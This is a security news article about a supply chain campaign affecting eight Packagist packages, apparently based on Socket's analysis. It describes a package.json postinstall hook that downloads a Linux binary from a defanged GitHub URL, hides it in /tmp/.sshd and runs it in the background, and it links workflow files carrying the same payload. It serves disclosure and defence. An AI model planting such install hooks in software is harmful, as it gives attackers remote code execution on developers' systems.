A new "coordinated" supply chain attack campaign has impacted eight packages on **Packagist** including malicious code designed to run a Linux binary retrieved from a GitHub Releases URL. "Although the affected packages were all Composer packages, the malicious code was not added to composer.json," **Socket** said. "Instead, it was inserted into package.json, targeting projects that ship JavaScript build tooling alongside PHP code."  ### Cross-Ecosystem Targeting This "cross-ecosystem placement" makes the activity stand out because developers and security teams scanning PHP dependencies may only focus on Composer-related metadata, while skipping `package.json` lifecycle hooks that are bundled within the package. The malicious versions have since been removed from Packagist. An analysis of the packages has uncovered that their upstream repositories have been modified to include a `postinstall` script that attempts to download a Linux binary from a GitHub Releases URL (`github[.]com/parikhpreyash4/systemd-network-helper-aa5c751f`), save it to the `/tmp/.sshd` folder, change its permissions using `chmod` to grant execute permissions to all users, and run it in the background. ### Affected Packages The names of the packages and the associated affected version are listed below: * moritz-sauer-13/silverstripe-cms-theme (dev-master) * crosiersource/crosierlib-base (dev-master) * devdojo/wave (dev-main) * devdojo/genesis (dev-main) * katanaui/katana (dev-main) * elitedevsquad/sidecar-laravel (3.x-dev) * r2luna/brain (dev-main) * baskarcm/tzi-chat-ui (dev-main)  ### Broader Campaign? **Socket's** investigation has found references to the same payload across 777 files in **GitHub**, suggesting that it could be part of a broader campaign. In at least two instances, it was added to a GitHub workflow. However, it's currently not known how many of these match distinct compromises, forks, duplicate package artifacts, or cached references. * [Instance 1](https://github.com/448776129/UA2F/blob/master/.github/workflows/ci.yml) * [Instance 2](https://github.com/448776129/blog-1/blob/9ebac2e4118396b84e508585f356bf06971c4fb5/.github/workflows/deploy_coding.yml) "This suggests the attacker was not relying on a single execution mechanism. In package artifacts, the payload was triggered through `package.json` `postinstall` scripts," the application security firm said. "In workflow files, it was positioned to run during GitHub Actions jobs." ### Payload Analysis What's more, the exact nature of the payload downloaded from GitHub is unclear, as the GitHub account associated with the repository hosting it is no longer available. The choice of the name "gvfsd-network" for the malware is interesting, as it refers to a **GNOME** Virtual File System (**GVfs**) daemon responsible for managing and browsing network shares. "Even without the second-stage binary, the malicious installer is enough to warrant blocking," **Socket** said. "It provides remote code execution during installation or build workflows and attempts to hide its activity by disabling TLS verification, suppressing errors, and running a downloaded binary in the background."